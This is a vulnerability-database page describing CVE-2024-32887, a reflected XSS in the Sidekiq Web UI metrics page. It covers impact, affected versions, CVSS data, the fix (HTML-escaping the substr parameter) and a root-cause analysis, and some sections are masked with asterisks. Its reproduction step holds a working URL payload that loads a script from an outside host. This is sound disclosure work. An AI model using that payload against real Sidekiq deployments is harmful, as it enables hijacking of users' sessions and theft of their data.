5.5

CVSS Score

3.1

Basic Information

CVE ID

CVE-2024-32887

GHSA ID

GHSA-q655-3pj8-9fxq

EPSS Score

0.43012%

CWE

CWE-79

Published

4/26/2024

Updated

5/1/2024

KEV Status

Technology

Ruby

Concerned about an active attack path?

Talk to our security experts and see Miggo in action.

Miggo Vulnerability Database

→

CVE-2024-32887

CVE-2024-32887: Sidekiq vulnerable to a Reflected XSS in Queues Web Page

Description:

During the source Code Review of the metrics.erb view of the Sidekiq Web UI, A reflected XSS vulnerability is discovered. The value of substr parameter is reflected in the response without any encoding, allowing an attacker to inject Javascript code into the response of the application.

This vulnerability can be exploited to target the users of the application, and users of other applications deployed on the same domain or website as that of the Sidekiq website. Successful exploit results may result in compromise of user accounts and user data.

Impact:

The impact of this vulnerability can be severe. An attacker could exploit it to target users of the Sidekiq Web UI. Moreover, if other applications are deployed on the same domain or website as Sidekiq, users of those applications could also be affected, leading to a broader scope of compromise. Potentially compromising their accounts, forcing the users to perform sensitive actions, stealing sensitive data, performing CORS attacks, defacement of the web application, etc.

Mitigation:

Encode all output data before rendering it in the response to prevent XSS attacks.

Steps to Reproduce:

Go to the following URL of the sidekiq Web UI: https://{host}/sidekiq/metrics?substr=beret%22%3E%3Cscript%20src=%22https://cheemahq.vercel.app/a.js%22%20/%3E
XSS payload will be executed, causing a popup.

Evidence:

Figure 1: Source Code Vulnerable to XSS

Figure 2: XSS payload triggered

(GitHub Advisory)

5.5

CVSS Score

3.1

Basic Information

CVE ID

CVE-2024-32887

GHSA ID

GHSA-q655-3pj8-9fxq

EPSS Score

0.43012%

CWE

CWE-79

Published

4/26/2024

Updated

5/1/2024

KEV Status

Technology

Ruby

Technical Details

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:L

Package Name	Ecosystem	Vulnerable Versions	First Patched Version
sidekiq	rubygems	>= 7.2.0, < 7.2.4	7.2.4

Vulnerability Intelligence
Miggo AI

Root Cause Analysis

The commit diff shows the fix added HTML escaping (h(params[:substr])) to the metrics.erb template. The original unescaped <%= params[:substr] %> in the input's value attribute created an XSS vector. ERB templates without proper output encoding are a well-known XSS risk pattern. The direct parameter reflection in a UI component with demonstrated exploitability confirms this as the vulnerable code path.

Vulnerable functions

Only Mi**o us*rs **n s** t*is s**tion

WAF Protection Rules

WAF Rule

### **s*ription: *urin* t** sour** *o** R*vi*w o* t** m*tri*s.*r* vi*w o* t** Si**kiq W** UI, * r**l**t** XSS vuln*r**ility is *is*ov*r**. T** v*lu* o* su*str p*r*m*t*r is r**l**t** in t** r*spons* wit*out *ny *n*o*in*, *llowin* *n *tt**k*r to inj**t

Reasoning

T** *ommit *i** s*ows t** *ix ***** *TML *s**pin* (*(p*r*ms[:su*str])) to t** m*tri*s.*r* t*mpl*t*. T** ori*in*l un*s**p** <%= p*r*ms[:su*str] %> in t** input's v*lu* *ttri*ut* *r**t** *n XSS v**tor. *R* t*mpl*t*s wit*out prop*r output *n*o*in* *r* *

5.5

Basic Information

Concerned about an active attack path?

CVE-2024-32887: Sidekiq vulnerable to a Reflected XSS in Queues Web Page

Description:

Impact:

Mitigation:

Steps to Reproduce:

Evidence:

5.5

Basic Information

Technical Details

Vulnerability IntelligenceMiggo AI

Root Cause Analysis

Vulnerable functions

WAF Protection Rules

WAF Rule

Reasoning

Vulnerability Intelligence
Miggo AI